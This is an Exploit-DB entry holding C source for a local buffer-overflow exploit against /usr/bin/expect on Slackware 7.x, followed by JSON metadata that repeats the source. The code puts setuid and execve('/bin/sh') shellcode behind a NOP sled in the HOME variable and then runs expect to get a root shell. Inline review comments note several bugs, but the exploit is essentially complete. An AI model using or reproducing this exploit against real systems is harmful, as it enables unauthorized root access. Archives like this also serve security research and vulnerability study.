ID EDB-ID:218
Type exploitdb
Reporter isox
Modified 2000-12-04T00:00:00
Description
expect (/usr/bin/expect) buffer overflow. Local exploit for the Linux platform.
/* hhp-expect_smash.c (12/11/00)
*
* expect (/usr/bin/expect) buffer overflow.
* Tested on 5.31.8 and 5.28.1, Slackware 7.x (maybe others).
*
* By: isox
* Site: www.hhp-programming.net
* Advisory: www.hhp-programming.net/ouradvisories/hhp-expect_adv%2317.txt
*/
#include <stdio.h>
#include <stdlib.h>
/* x86 one-byte NOP opcode, used to fill the front of the buffer in main(). */
#define NOP 0x90
/* Initial value of main()'s `offset`; that variable is assigned but never read. */
#define OFFSET 0
/* Size of the heap buffer that main() builds and exports as HOME. */
#define BUFLEN 416
/* Default address stored at every 4 bytes of the buffer (see main()).
 * Platform-specific; argv[3] overrides it when four arguments are given. */
#define RET 0xbffff580 /* Slackware 7.1 */
/* Program run via system() after HOME has been replaced. */
#define EXPECT "/usr/bin/expect"
/* Payload bytes copied into the buffer by main(); the array ends with the
 * literal "/bin/sh". None of the escaped bytes is 0x00, so strlen(code)
 * spans the whole payload. Declared writable (not const). */
char code[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x66\x31\xc0\x66\x31"
"\xdb\xb0\x2e\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
"\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
"\xdc\xff\xff\xff/bin/sh\x69";
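/*
 * Print the command-line usage text to stderr and terminate with status 1.
 *
 * arg: argv[0], echoed into every example line.
 *
 * RET is an unsuffixed hex constant (unsigned int), but the example lines
 * print it with %lx; the values are cast to unsigned long so the format
 * specifier matches the argument type (a mismatch is undefined behaviour).
 * Does not return.
 */
void usage(char *arg) {
    fprintf(stderr, "\nUsage: %s [offset up/down] [eip]\n\n", arg);
    fprintf(stderr, "Examples:\n");
    fprintf(stderr, "\t%s 347 up -=- Default EIP increased by 347 bytes\n", arg);
    fprintf(stderr, "\t%s 347 down -=- Default EIP decreased by 347 bytes\n", arg);
    fprintf(stderr, "\t%s 429 up 0x%lx -=- EIP set to 0x%lx and increased by 429 bytes\n",
            arg, (unsigned long)RET, (unsigned long)RET + 429);
    fprintf(stderr, "\t%s 429 down 0x%lx -=- EIP set to 0x%lx and decreased by 429 bytes\n\n",
            arg, (unsigned long)RET, (unsigned long)RET - 429);
    exit(1);
}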
/*
 * Entry point. Parses argv, builds a BUFLEN-byte heap buffer in which
 * `address` is repeated every 4 bytes, overwrites the front with NOP bytes,
 * copies `code` in just before the final 4 bytes, then exports the buffer as
 * HOME and runs EXPECT via system().
 *
 * argv[1]: decimal offset (atoi, no error checking)
 * argv[2]: "up" or "down"
 * argv[3]: optional hex base address (strtoul, no error checking)
 *
 * NOTE(review): strcmp() and strlen() are called below but <string.h> is not
 * included, so they are implicitly declared (rejected by C99 and later).
 * NOTE(review): main() ends without a return statement.
 */
int main(int argc, char *argv[]) {
char *buf, *p;
/* `address` is assigned only when argv[2] is exactly "up" or "down"; for any
 * other value it is read uninitialized by the fill loop below (undefined
 * behaviour). */
long *addressp, address;
int offset=OFFSET; /* assigned but never used */
int i;
if((argc < 3) || (argc > 4))
usage(argv[0]); /* usage() calls exit(1) and does not return */
if(argc == 3) {
if(!strcmp(argv[2], "up")) {
address = RET + atoi(argv[1]);
printf("Increasing offset by: %d\n", atoi(argv[1]));
printf("Increasing EIP to: 0x%x\n\n", RET + atoi(argv[1]));
}
if(!strcmp(argv[2], "down")) {
address = RET - atoi(argv[1]);
printf("Decreasing offset by: %d\n", atoi(argv[1]));
printf("Decreasing EIP to: 0x%x\n\n", RET - atoi(argv[1]));
}
}
if(argc >= 4) {
/* strtoul() returns unsigned long, yet every printf in this block prints it
 * with %x: the specifier does not match the argument type. */
if(!strcmp(argv[2], "up")) {
address = strtoul(argv[3], NULL, 16) + atoi(argv[1]);
printf("Setting EIP to: 0x%x\n", strtoul(argv[3], NULL, 16));
printf("Increasing offset by: %d\n", atoi(argv[1]));
printf("Increasing EIP to: 0x%x\n\n", (strtoul(argv[3], NULL, 16) + atoi(argv[1])));
}
if(!strcmp(argv[2], "down")) {
/* NOTE(review): this branch adds the offset, unlike the argc == 3 "down"
 * path above and the "Decreasing" messages printed right after it. */
address = strtoul(argv[3], NULL, 16) + atoi(argv[1]);
printf("Setting EIP to: 0x%x\n", strtoul(argv[3], NULL, 16));
printf("Decreasing offset by: %d\n", atoi(argv[1]));
printf("Decreasing EIP to: 0x%x\n\n", (strtoul(argv[3], NULL, 16) - atoi(argv[1])));
}
}
if (!(buf = (char *)malloc(BUFLEN))) { /* the cast is unnecessary in C */
printf("Can't allocate memory.\n"); /* error goes to stdout, not stderr */
exit(-1);
}
p = buf;
addressp = (long *) p;
/* Stores a `long` at every 4-byte step. This stays inside the BUFLEN
 * allocation only when sizeof(long) == 4 (32-bit targets); with an 8-byte
 * long the loop writes twice the allocated size. */
for (i = 0; i < BUFLEN; i+=4) {
*(addressp++) = address;
}
/* Overwrite the leading part of the buffer with NOP bytes, leaving room for
 * `code` plus the last 4 bytes, which keep the `address` value written
 * above. `i` is int while the bound is size_t (signed/unsigned comparison). */
for (i = 0; i < (BUFLEN - strlen(code) - 4); i++) {
buf[i] = NOP;
}
p = buf + (BUFLEN - strlen(code) - 4);
/* Copy the strlen(code) payload bytes into the gap left by the loop above. */
for (i = 0; i < strlen(code); i++)
*(p++) = code[i];
/* Off-by-one: buf holds BUFLEN bytes (indices 0..BUFLEN-1), so this writes
 * one byte past the end of the allocation. */
buf[BUFLEN] = '\0';
setenv("HOME", buf, 1); /* replaces any existing HOME value */
system(EXPECT); /* the child inherits the modified environment */
}
// milw0rm.com [2000-12-04]
{"id": "EDB-ID:218", "hash": "2619f93edbc81bc50f3995bf2ca8ff60", "type": "exploitdb", "bulletinFamily": "exploit", "title": "expect /usr/bin/expect Buffer Overflow", "description": "expect (/usr/bin/expect) buffer overflow. Local exploit for linux platform", "published": "2000-12-04T00:00:00", "modified": "2000-12-04T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/218/", "reporter": "isox", "references": [], "cvelist": [], "lastseen": "2016-01-31T11:57:27", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2016-01-31T11:57:27"}, "vulnersScore": 7.2}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/218/", "sourceData": "/* hhp-expect_smash.c (12/11/00)\r\n *\r\n * expect (/usr/bin/expect) buffer overflow.\r\n * Tested 5.31.8 and 5.28.1, slackware 7.x (Maybe others).\r\n *\r\n * By: isox\r\n * Site: www.hhp-programming.net\r\n * Advisory: www.hhp-programming.net/ouradvisories/hhp-expect_adv%2317.txt\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n\r\n#define NOP\t\t\t\t0x90\r\n#define OFFSET\t\t\t0\r\n#define BUFLEN\t\t\t416\r\n#define RET\t\t\t\t0xbffff580\t\t\t/* Slackware 7.1 */\r\n#define EXPECT\t\t\t\"/usr/bin/expect\"\r\n\r\nchar code[] =\r\n \"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\\x66\\x31\\xc0\\x66\\x31\"\r\n \"\\xdb\\xb0\\x2e\\xcd\\x80\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\"\r\n \"\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\"\r\n \"\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\\x80\\xe8\"\r\n \"\\xdc\\xff\\xff\\xff/bin/sh\\x69\";\r\n\r\nvoid usage(char *arg) {\r\n fprintf(stderr, \"\\nUsage: %s [offset up/down] [eip]\\n\\n\", arg);\r\n fprintf(stderr, \"Examples:\\n\");\r\n fprintf(stderr, \"\\t%s 347 up -=- Default EIP increased by 347 bytes\\n\", arg);\r\n fprintf(stderr, \"\\t%s 347 down -=- Default EIP decreased by 347 bytes\\n\", arg);\r\n 
fprintf(stderr, \"\\t%s 429 up 0x%lx -=- EIP set to 0x%lx and increased by 429 bytes\\n\", arg, RET, RET + 429);\r\n fprintf(stderr, \"\\t%s 429 down 0x%lx -=- EIP set to 0x%lx and decreased by 429 bytes\\n\\n\", arg, RET, RET - 429);\r\n exit(1);\r\n}\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n char *buf, *p;\r\n long *addressp, address;\r\n int offset=OFFSET;\r\n int i;\r\n\r\n\r\n if((argc < 3) || (argc > 4))\r\n usage(argv[0]);\r\n\r\n if(argc == 3) {\r\n if(!strcmp(argv[2], \"up\")) {\r\n address = RET + atoi(argv[1]);\r\n printf(\"Increasing offset by: %d\\n\", atoi(argv[1]));\r\n printf(\"Increasing EIP to: 0x%x\\n\\n\", RET + atoi(argv[1]));\r\n }\r\n\r\n if(!strcmp(argv[2], \"down\")) {\r\n address = RET - atoi(argv[1]);\r\n printf(\"Decreasing offset by: %d\\n\", atoi(argv[1]));\r\n printf(\"Decreasing EIP to: 0x%x\\n\\n\", RET - atoi(argv[1]));\r\n }\r\n }\r\n\r\n if(argc >= 4) {\r\n if(!strcmp(argv[2], \"up\")) {\r\n address = strtoul(argv[3], NULL, 16) + atoi(argv[1]);\r\n printf(\"Setting EIP to: 0x%x\\n\", strtoul(argv[3], NULL, 16));\r\n printf(\"Increasing offset by: %d\\n\", atoi(argv[1]));\r\n printf(\"Increasing EIP to: 0x%x\\n\\n\", (strtoul(argv[3], NULL, 16) + atoi(argv[1])));\r\n }\r\n if(!strcmp(argv[2], \"down\")) {\r\n address = strtoul(argv[3], NULL, 16) + atoi(argv[1]);\r\n printf(\"Setting EIP to: 0x%x\\n\", strtoul(argv[3], NULL, 16));\r\n printf(\"Decreasing offset by: %d\\n\", atoi(argv[1]));\r\n printf(\"Decreasing EIP to: 0x%x\\n\\n\", (strtoul(argv[3], NULL, 16) - atoi(argv[1])));\r\n }\r\n }\r\n\r\n\r\n if (!(buf = (char *)malloc(BUFLEN))) {\r\n printf(\"Can't allocate memory.\\n\");\r\n exit(-1);\r\n }\r\n\r\n p = buf;\r\n addressp = (long *) p;\r\n\r\n for (i = 0; i < BUFLEN; i+=4) {\r\n *(addressp++) = address;\r\n }\r\n\r\n for (i = 0; i < (BUFLEN - strlen(code) - 4); i++) {\r\n buf[i] = NOP;\r\n }\r\n\r\n p = buf + (BUFLEN - strlen(code) - 4);\r\n\r\n for (i = 0; i < strlen(code); i++)\r\n *(p++) = code[i];\r\n\r\n 
buf[BUFLEN] = '\\0';\r\n\r\n\r\n setenv(\"HOME\", buf, 1);\r\n system(EXPECT);\r\n}\r\n\n\n// milw0rm.com [2000-12-04]\n", "osvdbidlist": ["60979"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{}